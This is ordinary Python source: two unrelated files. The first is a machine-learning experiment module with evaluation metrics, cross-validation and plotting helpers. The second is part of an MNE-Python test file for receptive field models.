def plot_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
"""
Plots a confusion matrix based on the evalution results.
:param save_to_folder: determines the folder where the plot should be saved
:return: plt, file_name
"""
confusion_matrix = metrics.confusion_matrix(self.y_true, self.y_pred)
cm_normalized = confusion_matrix.astype('float') / confusion_matrix.sum(axis=1)[:, np.newaxis]
plt.imshow(cm_normalized, interpolation='nearest', cmap=plt.cm.Greys)
plt.title("Confusion matrix")
plt.colorbar()
tick_marks = np.arange(len(self.preprocessing.classes))
plt.xticks(tick_marks, self.preprocessing.classes, rotation=90)
plt.yticks(tick_marks, self.preprocessing.classes)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
file_name = _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "png")
if not os.path.exists(save_to_folder):
os.mkdir(save_to_folder)
plt.savefig(os.path.join(save_to_folder, file_name))
plt.close()
def plot_interactive_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__),
"ExperimentResults")):
"""
Plots an interactive confusion matrix based on the evalution results.
:param save_to_folder: determines the folder where the plot should be saved
:return: plt, file_name
"""
import plotly.offline
import plotly.graph_objs as go
confusion_matrix = metrics.confusion_matrix(self.y_true, self.y_pred)
cm_normalized = confusion_matrix.astype('float') / confusion_matrix.sum(axis=1)[:, np.newaxis]
file_name = os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "html"))
title = "<b>Acc: {:.1f}%, T5: {:.1f}%, T10: {:.1f}%, T20: {:.1f}%, " \
"MR: {:.1f}%, K: {:.1f}%, " \
"G: {:.1f}%</b>"\
.format(self.metrics.accuracy*100, self.metrics.top_5_accuracy*100,
self.metrics.top_10_accuracy*100, self.metrics.top_20_accuracy*100,
self.metrics.macro_recall*100, self.metrics.kappa*100, self.metrics.gmean*100)
for resolution_metric in self.resolution_metrics:
title += "<br>{:s}:{:05d}:{:03d} Acc: {:04.1f}%, T5: {:04.1f}%, T10: {:04.1f}%, T20: {:04.1f}%, " \
"MR: {:04.1f}%, K: {:04.1f}%, G: {:04.1f}%"\
.format(resolution_metric.resolution_range, resolution_metric.subset_size, resolution_metric.n_classes,
resolution_metric.accuracy*100, resolution_metric.top_5_accuracy*100,
resolution_metric.top_10_accuracy*100, resolution_metric.top_20_accuracy*100,
resolution_metric.macro_recall*100, resolution_metric.kappa*100, resolution_metric.gmean*100)
data = [
go.Heatmap(
x=self.preprocessing.classes,
y=self.preprocessing.classes[::-1],
z=cm_normalized[::-1, :].round(3),
colorscale=[[0.0, "rgb(255, 255, 255)"], [1.0, "rgb(0, 0,0)"]]
)
]
layout = go.Layout(
titlefont={"size": 14},
title=title,
xaxis={"title": "Predicted label"},
yaxis={"title": "True label"},
width=1000,
height=775,
autosize=False,
margin=go.Margin(
t=155,
l=200,
r=200,
autoexpand=False
),
)
plotly.offline.plot(dict(data=data, layout=layout), filename=file_name)
def _plot_interactive_feature_importance(self, feature_names, feature_importances, classifier_name,
save_to_folder=os.path.join(os.path.dirname(__file__),
"ExperimentResults")):
"""
Plots an interactive confusion matrix based on the evalution results.
:param save_plot_to_file: determines whether the created plot should be save to a file
:param save_to_folder: determines the folder where the plot should be saved
:return: plt, file_name
"""
import plotly.offline
import plotly.graph_objs as go
file_name = os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "feature_importance", "html"))
data = [
go.Bar(
x=feature_names,
y=feature_importances
)
]
layout = go.Layout(
title="Feature importance for " + classifier_name,
xaxis={"title": ""},
yaxis={"title": "Importance"},
width=800,
height=600,
autosize=False
)
plotly.offline.plot(dict(data=data, layout=layout), filename=file_name)
class RepeatedStratifiedKFold(skms._split._BaseKFold):
"""
Repeated Stratified K-Folds cross validation iterator. Provides train/test indices to split data in train test
sets. This cross-validation object is a variation of KFold that returns stratified folds and repeats the process a
given number of times. The folds are made by preserving the percentage of samples for each class.
"""
def _iter_test_indices(self, X=None, y=None, groups=None):
raise NotImplementedError
def __init__(self, n_iter=5, n_splits=2, random_state=None):
"""
:param n_iter: number of iterations (reshuffles)
:type n_iter: int, default=5
:param n_splits: number of folds. Must be at least 2.
:type n_splits: int, default=2
:param random_state: Pseudo-random number generator state used for random sampling. If None, use default numpy
RNG for shuffling
:type random_state: None, int or RandomState
"""
super(RepeatedStratifiedKFold, self).__init__(n_splits*n_iter, True, random_state)
self.n_iter = n_iter
self.skfs = []
for i in range(n_iter):
self.skfs.append(skms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state+i))
def _iter_test_masks(self, X, y=None, groups=None):
for i, skf in enumerate(self.skfs):
test_folds = skf._make_test_folds(X, y)
for j in range(skf.n_splits):
yield test_folds == j
def __repr__(self):
return '%s.%s(n_iter=%i, n_splits=%i, shuffle=%s, random_state=%s)' % (
self.__class__.__module__,
self.__class__.__name__,
self.n_iter,
self.n_splits/self.n_iter,
self.shuffle,
self.random_state,
)
def __len__(self):
return self.n_splits
def g_mean(y_true, y_pred, labels=None, correction=0.001):
"""
Computes the geometric mean of class-wise recalls.
:param y_true: True class labels.
:type y_true: list
:param y_pred: Predicted class labels.
:type y_pred: array-like
:param labels: Labels present in the data can be excluded, for example to calculate a multiclass average ignoring a
majority negative class, while labels not present in the data will result in 0 components in a macro average.
:type labels: list, optiona
:param correction: substitution/correction for zero values in class-wise recalls
:type correction: float
:return: G-mean value
"""
present_labels = unique_labels(y_true, y_pred)
if labels is None:
labels = present_labels
n_labels = None
else:
n_labels = len(labels)
labels = np.hstack([labels, np.setdiff1d(present_labels, labels, assume_unique=True)])
le = LabelEncoder()
le.fit(labels)
y_true = le.transform(y_true)
y_pred = le.transform(y_pred)
sorted_labels = le.classes_
# labels are now from 0 to len(labels) - 1 -> use bincount
tp = y_true == y_pred
tp_bins = y_true[tp]
if len(tp_bins):
tp_sum = bincount(tp_bins, weights=None, minlength=len(labels))
else:
# Pathological case
true_sum = tp_sum = np.zeros(len(labels))
if len(y_true):
true_sum = bincount(y_true, weights=None, minlength=len(labels))
# Retain only selected labels
indices = np.searchsorted(sorted_labels, labels[:n_labels])
tp_sum = tp_sum[indices]
true_sum = true_sum[indices]
recall = _prf_divide(tp_sum, true_sum, "recall", "true", None, "recall")
recall[recall == 0] = correction
return sp.stats.mstats.gmean(recall)
def brier_score_loss_for_true_class(y_true, y_proba):
"""
Calculates Brier score for from a set of class probabilities.
:param y_true: True class labels.
:type y_true: list
:param y_proba: Predicted class probabilities.
:type y_proba: array-like
:return: Brier score
"""
if y_proba is None:
return -1
try:
return metrics.brier_score_loss(y_true, y_proba[np.arange(len(y_proba)), y_true])
except:
return -1
def top_n_accuracy(y_true, y_proba, top_n=10):
"""
:param y_true:
:param y_proba:
:param top_n:
:return:
"""
if y_proba is None:
return -1
try:
top_n_pred = np.argsort(y_proba, axis=1)[:, -top_n:]
return np.average(
np.apply_along_axis(np.any, 1, np.equal(top_n_pred, np.repeat(y_true[:, np.newaxis], top_n, 1))))
except:
return -1
def worst_prediction_rank(y_true, y_proba):
"""
:param y_true:
:param y_proba:
:return:
"""
if y_proba is None:
return -1
try:
classes = y_proba.shape[1]
sorted_pred = np.argsort(y_proba, axis=1)
worst_rank = classes - np.min(
np.apply_along_axis(np.where, 1, np.equal(sorted_pred, np.repeat(y_true[:, np.newaxis], classes, 1))))
return worst_rank
except:
return -1
def mmap(var, filename):
#temp_folder = tempfile.mkdtemp()
temp_folder = os.path.abspath(os.path.dirname(__file__))
dir_filename = os.path.join(temp_folder, '%s.mmap' %filename)
if os.path.exists(dir_filename):
os.unlink(dir_filename)
_ = joblib.dump(var, dir_filename)
return joblib.load(dir_filename, mmap_mode='r+'), dir_filename
def train_classifier(classifier, X_train, y_train):
"""
Fits a classifier on the given data.
:param classifier: classifier
:param X_train: training attribute values
:param y_train: training classes
:return: a fitted model
"""
gc.collect()
logging.info("Training...")
# Experimental - to reduce memory consumption
# y_train, y_train_filename = mmap(y_train, 'y_train')
classifier.fit(X_train, y_train)
# Experimental - to reduce memory consumption
# X_train, X_train_filename = mmap(X_train, 'X_train')
gc.collect()
return classifier
def test_classifier(classifier, X_test, y_test, n_jobs=None):
"""
Tests a classifier on the given. If possible, this method also gets the probability of each class prediction.
:param classifier: classifier
:param X_test: testing attribute values
:param y_test: testing classes
:param n_jobs: overwriting number of threads used during prediction
:return: y_true, y_pred, y_prob
"""
gc.collect()
logging.info("Testing...")
if n_jobs is not None:
for param in classifier.get_params().keys():
if "n_jobs" in param or "nthread" in param:
classifier.set_params(**{param: n_jobs})
logging.debug("Update %s to %s" % (param, n_jobs))
# Experimental - to reduce memory consumption
# X_test, X_test_filename = mmap(X_test, 'X_test')
y_true = y_test
y_pred = classifier.predict(X_test)
y_prob = None
gc.collect()
try:
y_prob = classifier.predict_proba(X_test)
except:
logging.debug("Classifier does not produce probability scores")
gc.collect()
y_resolution = None
try:
y_resolution = X_test.resolution
except:
logging.debug("Did not find resolution column in test data")
return y_true, y_pred, y_prob, y_resolution
def select_model(classifier, param_grid, X_train, y_train, pipeline=None, seed=23, evaluation_metric="accuracy",
repeats=5, folds=2, jobs=-1):
"""
Performs model selection.
:param classifier: classifier
:param param_grid: parameters values to choose from
:param X_train: training attribute values
:param y_train: training class values
:param pipeline: preprocessing pipeline steps
:param seed: random seed for repeated stratified cross-validation
:param evaluation_metric: metric used to select best model
:param repeats: number of repeatitions in repeated stratified cross-validation
:param folds: number of folds in each repetition in repeated stratified cross-validation
:param jobs: number of jobs to run in parallel.
:return:
"""
cv_proc = RepeatedStratifiedKFold(n_iter=repeats, n_splits=folds, random_state=seed)
steps = list()
for key in list(param_grid[0].keys()):
param_grid[0]["clf__" + key] = param_grid[0].pop(key)
if pipeline is not None:
for step_name, step_value in pipeline:
for step_func, step_param_grid in iter(step_value.items()):
steps.append((step_name, step_func))
for key in list(step_param_grid[0].keys()):
param_grid[0][step_name + "__" + key] = step_param_grid[0][key]
steps.append(("clf", classifier))
pipe = Pipeline(steps)
gc.collect()
start = time.time()
_print_evaluation_header(pipe)
logging.info("Model selection...")
grid = skms.GridSearchCV(pipe, param_grid, cv=cv_proc, verbose=3, pre_dispatch=jobs,
scoring=evaluation_metric, n_jobs=jobs, iid=False)
gc.collect()
grid.fit(X_train, y_train)
search_time = time.time() - start
gc.collect()
return grid, search_time
def train_and_test(estimator, X, y, dataset_name, preprocessing, seed, test_split, write_to_csv=True,
save_confusion_matrix=False, learning_curve=False, confusion_matrix=True,
save_predictions=True, save_model=False, save_feature_importance=True):
"""
Performs simple classifier training and testing using a holdout procedure.
:param estimator: classifier
:param X: attribute values
:param y: class values
:param dataset_name: dataset name to distinguish different test runs in result files
:param preprocessing: Preprocessing() object
:param seed: random seed for data set splitting
:param test_split: percentage of the dataset that is held out for testing
:param write_to_csv: should the evaluation results be saved to a csv file
:param save_confusion_matrix: should the resulting confusion matrix be saved to a file
:param learning_curve: determines whether a learning curve will be plotted and saved to a file
:param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
:param save_predictions: saves prections (as well as probabilities and true classes) to a file
:param save_model: saves trained classifier to a file
:param save_feature_importance: saves feature importance to a csv and interactive html file (plot)
"""
X_train, X_test, y_train, y_test = skms.train_test_split(X, y, test_size=test_split, random_state=seed, stratify=y)
_print_evaluation_header(estimator)
training_start = time.time()
clf = train_classifier(estimator, X_train, y_train)
training_time = time.time() - training_start
testing_start = time.time()
y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X_test, y_test)
testing_time = time.time() - testing_start
logging.info("Evaluating")
evaluation = Evaluation(dataset_name, preprocessing, clf, None, y_true, y_pred, y_prob, y_resolution, None, None,
training_time, testing_time)
logging.info(evaluation)
_optional_output(clf, evaluation, X, y, write_to_csv, save_confusion_matrix, learning_curve,
confusion_matrix, save_predictions, save_model, save_feature_importance)
return evaluation
def run_experiment(classifiers, X, y, dataset_name, preprocessing, pipeline, seed, evaluation_metric="accuracy",
outer_cv=10, repeats=5, folds=2, jobs=-1, write_to_csv=True,
save_confusion_matrix=False, learning_curve=False, confusion_matrix=False,
save_predictions=False, save_model=False, save_feature_importance=False):
"""
Runs a series of experiments selecting model parameters and testing different classifiers.
:param classifiers:
:param X: attribute values
:param y: class values
:param dataset_name: dataset name to distinguish different test runs in result files
:param preprocessing: dataset Preprocessing() object
:param pipeline: preprocessing pipeline steps
:param seed: random seed for repeated stratified cross-validation
:param test_split: percentage of the dataset that is held out for testing
:param evaluation_metric: metric used to select best model
:param repeats: number of repeatitions in repeated stratified cross-validation
:param folds: number of folds in each repetition in repeated stratified cross-validation
:param jobs: number of jobs to run in parallel.
:param write_to_csv: should the evaluation results be saved to a csv file
:param save_confusion_matrix: should the resulting confusion matrix be saved to a file
:param learning_curve: determines whether a learning curve will be plotted and saved to a file
:param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
:return:
"""
classifiers = copy.deepcopy(classifiers)
for classifier, param_grid in iter(classifiers.items()):
cv = skms.StratifiedKFold(n_splits=outer_cv, random_state=seed, shuffle=False)
for fold_num, (train, test) in enumerate(cv.split(X, y)):
clf = copy.deepcopy(classifier)
params = copy.deepcopy(param_grid)
pipe = copy.deepcopy(pipeline)
logging.info("================================================================================")
logging.info("Fold %d:", fold_num)
logging.info("")
X_train, X_test = X.iloc[train,], X.iloc[test,]
y_train, y_test = y.iloc[train], y.iloc[test]
gc.collect()
search_results, search_time = select_model(clf, params, X_train, y_train, pipe, seed,
evaluation_metric, repeats, folds, jobs)
gc.collect()
testing_start = time.time()
y_true, y_pred, y_prob, y_resolution = test_classifier(search_results, X_test, y_test)
testing_time = time.time() - testing_start
evaluation = Evaluation(dataset_name, preprocessing, search_results.best_estimator_, params, y_true, y_pred,
y_prob, y_resolution, search_results, evaluation_metric, search_time, testing_time)
logging.info(evaluation)
_optional_output(search_results.best_estimator_, evaluation, X, y, write_to_csv, save_confusion_matrix,
learning_curve, confusion_matrix, save_predictions, save_model, save_feature_importance,
fold_num)
gc.collect()
def cross_validate(classifiers, X, y, dataset_name, preprocessing, seed, cv_folds=10, write_to_csv=True,
save_confusion_matrix=True, learning_curve=False, confusion_matrix=False,
save_predictions=True, save_model=False, save_feature_importance=True):
"""
Runs a series of experiments selecting model parameters and testing different classifiers.
:param classifiers:
:param X: attribute values
:param y: class values
:param dataset_name: dataset name to distinguish different test runs in result files
:param preprocessing: dataset Preprocessing() object
:param pipeline: preprocessing pipeline steps
:param seed: random seed for repeated stratified cross-validation
:param test_split: percentage of the dataset that is held out for testing
:param evaluation_metric: metric used to select best model
:param repeats: number of repeatitions in repeated stratified cross-validation
:param folds: number of folds in each repetition in repeated stratified cross-validation
:param jobs: number of jobs to run in parallel.
:param write_to_csv: should the evaluation results be saved to a csv file
:param save_confusion_matrix: should the resulting confusion matrix be saved to a file
:param learning_curve: determines whether a learning curve will be plotted and saved to a file
:param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
:return:
"""
classifiers = copy.deepcopy(classifiers)
for classifier in classifiers:
cv = skms.StratifiedKFold(n_splits=cv_folds, random_state=seed, shuffle=False)
for fold_num, (train, test) in enumerate(cv.split(X, y)):
clf = copy.deepcopy(classifier)
logging.info("================================================================================")
logging.info("Fold %d:", fold_num)
logging.info("")
X_train, X_test = X.iloc[train,], X.iloc[test,]
y_train, y_test = y.iloc[train], y.iloc[test]
gc.collect()
training_start = time.time()
_print_evaluation_header(clf)
clf = train_classifier(clf, X_train, y_train)
training_time = time.time() - training_start
gc.collect()
testing_start = time.time()
y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X_test, y_test)
testing_time = time.time() - testing_start
logging.info("Evaluating")
evaluation = Evaluation(dataset_name, preprocessing, clf, None, y_true, y_pred, y_prob, y_resolution, None,
None, training_time, testing_time)
logging.info(evaluation)
_optional_output(clf, evaluation, X, y, write_to_csv, save_confusion_matrix, learning_curve,
confusion_matrix, save_predictions, save_model, save_feature_importance, fold_num)
gc.collect()
def compare_datasets(classifiers, data_folder, dataset_names, class_attr, selected_attr, max_num_of_classes,
min_examples_per_class, pipeline, seed, repeats=5, folds=2, write_to_csv=True,
create_box_plot=True, validation_data=None, twilight_data=None,
save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
comparison_file = "Comparison" + time.strftime("%Y%m%d_%H%M%S", time.localtime()) + ".csv"
logging.info("Finding common examples...")
common_blobs = _get_common_blobs([os.path.join(data_folder, fix) for fix in dataset_names])
for dataset_name in dataset_names:
dataset_path = os.path.join(data_folder, dataset_name)
clean_data = prep.DatasetCleaner(prep.read_dataset(dataset_path), class_attribute=class_attr,
select_attributes=selected_attr, max_num_of_classes=max_num_of_classes,
min_examples_per_class=min_examples_per_class, seed=seed,
where_title=common_blobs, sort_by_title=True, filter_examples=True,
validation_data=validation_data, twilight_data=twilight_data)
X, y = clean_data.prepare_for_classification(class_attr, [class_attr])
for classifier, param_grid in iter(classifiers.items()):
steps = list()
if pipeline is not None:
for step_name, step_value in pipeline:
for step_func, step_param_grid in iter(step_value.items()):
steps.append((step_name, step_func))
steps.append(("clf", classifier))
pipe = Pipeline(steps)
_print_evaluation_header(pipe)
cv_proc = RepeatedStratifiedKFold(n_iter=repeats, n_splits=folds, random_state=seed)
fold_num = 0
for train, test in cv_proc.split(X, y):
logging.info("Fold: " + str(fold_num))
fold_num += 1
training_start = time.time()
clf = train_classifier(pipe, X.iloc[train, :], y[train])
training_time = time.time() - training_start
testing_start = time.time()
y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X.iloc[test, :], y[test])
testing_time = time.time() - testing_start
evaluation = Evaluation(dataset_name, clean_data, clf, None, y_true, y_pred, y_prob, y_resolution,
None, None, training_time, testing_time)
if write_to_csv:
evaluation.write_to_csv(file_name=comparison_file, save_to_folder=save_to_folder)
if create_box_plot:
logging.info("Plotting comparison results...")
df = pd.read_csv(os.path.join(save_to_folder, comparison_file))
df.loc[:, "Dataset"] = df.loc[:, "Dataset"].str.slice(0, -4)
df.loc[df["Classifier"] == "KNeighborsClassifier", "Classifier"] = "k-NN"
df.loc[df["Classifier"] == "RandomForestClassifier", "Classifier"] = "RF"
df.loc[df["Classifier"] == "LogisticRegression", "Classifier"] = "Logit"
df.loc[df["Classifier"] == "SVC", "Classifier"] = "SVM"
df.loc[df["Classifier"] == "LGBMClassifier", "Classifier"] = "LightGBM"
plot_comparison(df, file_name=comparison_file + ".png", save_to_folder=save_to_folder)
def lgbm_cv_early_stopping(lgbm, X, y, pipeline, seed, outer_cv=10, repeats=2, folds=5, early_stopping_rounds=10):
cv = skms.StratifiedKFold(n_splits=outer_cv, random_state=seed, shuffle=False)
for fold_num, (train, test) in enumerate(cv.split(X, y)):
X_train, X_test = X.iloc[train,], X.iloc[test,]
y_train, y_test = y.iloc[train], y.iloc[test]
rskf = RepeatedStratifiedKFold(random_state=seed, n_iter=repeats, n_splits=folds)
best_iterations = []
if pipeline is not None:
steps = []
for step_name, step_value in pipeline:
for step_func, step_param_grid in iter(step_value.items()):
steps.append((step_name, step_func))
pipe = Pipeline(steps)
else:
pipe = lgbm
for train, test in rskf.split(X_train, y_train):
X_train_fold = X_train.iloc[train, :].copy()
y_train_fold = y_train.iloc[train].copy()
X_test_fold = X_train.iloc[test, :].copy()
y_test_fold = y_train.iloc[test].copy()
if pipeline is not None:
pipe_fold = clone(pipe)
X_train_fold = pipe_fold.fit_transform(X_train_fold, y_train_fold)
X_test_fold = pipe_fold.transform(X_test_fold)
fit = lgbm.fit(X_train_fold, y_train_fold, early_stopping_rounds=early_stopping_rounds,
eval_set=[(X_test_fold, y_test_fold)], eval_metric="multi_logloss", verbose=False)
best_iter = int(fit.best_iteration)
best_iterations.append(best_iter)
logging.info("Best iteration: {0} ".format(str(best_iter)))
mean_best_iter = int(np.mean(best_iterations))
logging.info("Fold %d: Rounded mean best number of boosting iterations: %s", fold_num, str(mean_best_iter))
def plot_comparison(df, file_name, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
sns.set_style("whitegrid")
df = util.pandas_gather(df, "Metric", "Score", ["Accuracy", "Macro recall", "Kappa", "G-mean"])
g = sns.FacetGrid(df, row="Classifier", col="Metric", sharey=False, margin_titles=True)
g = (g.map(sns.boxplot, "Dataset", "Score"))
g.set_xticklabels(rotation="vertical")
if not os.path.exists(save_to_folder):
os.mkdir(save_to_folder)
sns.plt.savefig(os.path.join(save_to_folder, file_name))
sns.plt.close()
def plot_learning_curve(classifier, X, y, measurements=[0.1, 0.325, 0.55, 0.775, 1.], metric=None, n_jobs=-1,
save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
"""
Calculates the learning curve for a given model (classifier or regressor). The methods takes the evaluation
metric as a parameter. Additionally the method saves a plot of the calculated learning curve to a file.
:param classifier: learning model
:type classifier: sklearn estimator
:param X: training data
:type X: DataFrame
:param y: training labels
:type y: Series
:param measurements: number of measurements of classifier/regressor performance (number of point defining
the learning curve)
:type measurements: int
:param metric: evaluation metric
:type metric: sklearn scorer
:param n_jobs: number of threads
:type n_jobs: int
:param save_to_folder: determines the folder where the learning curve plot should be saved
:type save_to_folder: str
:return: plt, file_name
"""
sns.set_style("whitegrid")
plt.figure()
plt.title("Learning curves")
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = skms.learning_curve(classifier, X, y, n_jobs=n_jobs,
train_sizes=measurements, scoring=metric)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
plt.legend(loc="best")
file_name = _get_file_name("", classifier, "learning_curve", "png")
if not os.path.exists(save_to_folder):
os.mkdir(save_to_folder)
plt.savefig(os.path.join(save_to_folder, file_name))
plt.close()
def _get_common_blobs(dataset_paths, key="title", sep=";", header=0, na_values=["n/a", "nan"], low_memory=False):
merged = pd.read_csv(dataset_paths[0], sep=sep, header=header, na_values=na_values, low_memory=low_memory)
merged = merged.loc[merged["part_00_electrons"] > 0, :]
for i in range(len(dataset_paths) - 1):
df2 = pd.read_csv(dataset_paths[i + 1], sep=sep, header=header, na_values=na_values, low_memory=low_memory)
df2 = df2.loc[df2["part_00_electrons"] > 0, :]
merged = pd.merge(merged, df2, how="inner", on=[key])
merged = merged.drop_duplicates(subset=key, keep="first")
return merged[key]
def _optional_output(estimator, evaluation, X, y, write_to_csv, save_confusion_matrix,
learning_curve, confusion_matrix, save_predictions, save_model,
save_feature_importance, fold_num=None):
if write_to_csv:
logging.info("Saving results to file...")
evaluation.write_to_csv(fold_num=fold_num)
if save_confusion_matrix:
logging.info("Saving confusion matrix to file...")
evaluation.save_confusion_matrix()
if learning_curve:
logging.info("Creating learning curve...")
plot_learning_curve(estimator, X, y)
if confusion_matrix:
logging.info("Plotting confusion matrix...")
evaluation.plot_interactive_confusion_matrix()
if save_predictions:
logging.info("Saving predictions to file...")
evaluation.save_predictions()
if save_model:
logging.info("Saving model to file...")
evaluation.save_model()
if save_feature_importance:
logging.info("Saving feature importance to file...")
evaluation.save_feature_importance()
def _print_evaluation_header(pipeline):
logging.info("--------------------------------------------------------------------------------")
logging.info(time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime()))
logging.info("")
logging.info(str(pipeline))
logging.info("--------------------------------------------------------------------------------")
def _get_file_name(dataset, classifier, name, file_type):
classifier_name = type(classifier).__name__
if classifier_name == "Pipeline":
classifier_name = type(classifier.steps[-1][1]).__name__
pipeline_name = classifier.steps[0][0]
else:
pipeline_name = "clf"
if len(dataset) > 4 and dataset[-4] == ".":
dataset = dataset[:-4]
return "{0}_{1}_{2}_{3}_{4}.{5}".format(dataset, classifier_name, pipeline_name, name,
time.strftime("%Y%m%d_%H%M%S", time.localtime()), file_type)
| |
# Authors: Chris Holdgraf <choldgraf@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
import pytest
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose, assert_equal
from mne.fixes import einsum, rfft, irfft
from mne.utils import requires_sklearn, run_tests_if_main
from mne.decoding import ReceptiveField, TimeDelayingRidge
from mne.decoding.receptive_field import (_delay_time_series, _SCORERS,
_times_to_delays, _delays_to_slice)
from mne.decoding.time_delaying_ridge import (_compute_reg_neighbors,
_compute_corrs)
data_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(data_dir, 'test_raw.fif')
event_name = op.join(data_dir, 'test-eve.fif')
tmin, tmax = -0.1, 0.5
event_id = dict(aud_l=1, vis_l=3)
# Loading raw data
n_jobs_test = (1, 'cuda')
def test_compute_reg_neighbors():
"""Test fast calculation of laplacian regularizer."""
for reg_type in (
('ridge', 'ridge'),
('ridge', 'laplacian'),
('laplacian', 'ridge'),
('laplacian', 'laplacian')):
for n_ch_x, n_delays in (
(1, 1), (1, 2), (2, 1), (1, 3), (3, 1), (1, 4), (4, 1),
(2, 2), (2, 3), (3, 2), (3, 3),
(2, 4), (4, 2), (3, 4), (4, 3), (4, 4),
(5, 4), (4, 5), (5, 5),
(20, 9), (9, 20)):
for normed in (True, False):
reg_direct = _compute_reg_neighbors(
n_ch_x, n_delays, reg_type, 'direct', normed=normed)
reg_csgraph = _compute_reg_neighbors(
n_ch_x, n_delays, reg_type, 'csgraph', normed=normed)
assert_allclose(
reg_direct, reg_csgraph, atol=1e-7,
err_msg='%s: %s' % (reg_type, (n_ch_x, n_delays)))
@requires_sklearn
def test_rank_deficiency():
"""Test signals that are rank deficient."""
# See GH#4253
from sklearn.linear_model import Ridge
N = 256
fs = 1.
tmin, tmax = -50, 100
reg = 0.1
rng = np.random.RandomState(0)
eeg = rng.randn(N, 1)
eeg *= 100
eeg = rfft(eeg, axis=0)
eeg[N // 4:] = 0 # rank-deficient lowpass
eeg = irfft(eeg, axis=0)
win = np.hanning(N // 8)
win /= win.mean()
y = np.apply_along_axis(np.convolve, 0, eeg, win, mode='same')
y += rng.randn(*y.shape) * 100
for est in (Ridge(reg), reg):
rf = ReceptiveField(tmin, tmax, fs, estimator=est, patterns=True)
rf.fit(eeg, y)
pred = rf.predict(eeg)
assert_equal(y.shape, pred.shape)
corr = np.corrcoef(y.ravel(), pred.ravel())[0, 1]
assert corr > 0.995
def test_time_delay():
"""Test that time-delaying w/ times and samples works properly."""
# Explicit delays + sfreq
X = np.random.RandomState(0).randn(1000, 2)
assert (X == 0).sum() == 0 # need this for later
test_tlims = [
((1, 2), 1),
((1, 1), 1),
((0, 2), 1),
((0, 1), 1),
((0, 0), 1),
((-1, 2), 1),
((-1, 1), 1),
((-1, 0), 1),
((-1, -1), 1),
((-2, 2), 1),
((-2, 1), 1),
((-2, 0), 1),
((-2, -1), 1),
((-2, -1), 1),
((0, .2), 10),
((-.1, .1), 10)]
for (tmin, tmax), isfreq in test_tlims:
# sfreq must be int/float
with pytest.raises(TypeError, match='`sfreq` must be an instance of'):
_delay_time_series(X, tmin, tmax, sfreq=[1])
# Delays must be int/float
with pytest.raises(TypeError, match='.*complex.*'):
_delay_time_series(X, np.complex128(tmin), tmax, 1)
# Make sure swapaxes works
start, stop = int(round(tmin * isfreq)), int(round(tmax * isfreq)) + 1
n_delays = stop - start
X_delayed = _delay_time_series(X, tmin, tmax, isfreq)
assert_equal(X_delayed.shape, (1000, 2, n_delays))
# Make sure delay slice is correct
delays = _times_to_delays(tmin, tmax, isfreq)
assert_array_equal(delays, np.arange(start, stop))
keep = _delays_to_slice(delays)
expected = np.where((X_delayed != 0).all(-1).all(-1))[0]
got = np.arange(len(X_delayed))[keep]
assert_array_equal(got, expected)
assert X_delayed[keep].shape[-1] > 0
assert (X_delayed[keep] == 0).sum() == 0
del_zero = int(round(-tmin * isfreq))
for ii in range(-2, 3):
idx = del_zero + ii
err_msg = '[%s,%s] (%s): %s %s' % (tmin, tmax, isfreq, ii, idx)
if 0 <= idx < X_delayed.shape[-1]:
if ii == 0:
assert_array_equal(X_delayed[:, :, idx], X,
err_msg=err_msg)
elif ii < 0: # negative delay
assert_array_equal(X_delayed[:ii, :, idx], X[-ii:, :],
err_msg=err_msg)
assert_array_equal(X_delayed[ii:, :, idx], 0.)
else:
assert_array_equal(X_delayed[ii:, :, idx], X[:-ii, :],
err_msg=err_msg)
assert_array_equal(X_delayed[:ii, :, idx], 0.)
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_basic(n_jobs):
"""Test model prep and fitting."""
from sklearn.linear_model import Ridge
# Make sure estimator pulling works
mod = Ridge()
rng = np.random.RandomState(1337)
# Test the receptive field model
# Define parameters for the model and simulate inputs + weights
tmin, tmax = -10., 0
n_feats = 3
rng = np.random.RandomState(0)
X = rng.randn(10000, n_feats)
w = rng.randn(int((tmax - tmin) + 1) * n_feats)
# Delay inputs and cut off first 4 values since they'll be cut in the fit
X_del = np.concatenate(
_delay_time_series(X, tmin, tmax, 1.).transpose(2, 0, 1), axis=1)
y = np.dot(X_del, w)
# Fit the model and test values
feature_names = ['feature_%i' % ii for ii in [0, 1, 2]]
rf = ReceptiveField(tmin, tmax, 1, feature_names, estimator=mod,
patterns=True)
rf.fit(X, y)
assert_array_equal(rf.delays_, np.arange(tmin, tmax + 1))
y_pred = rf.predict(X)
assert_allclose(y[rf.valid_samples_], y_pred[rf.valid_samples_], atol=1e-2)
scores = rf.score(X, y)
assert scores > .99
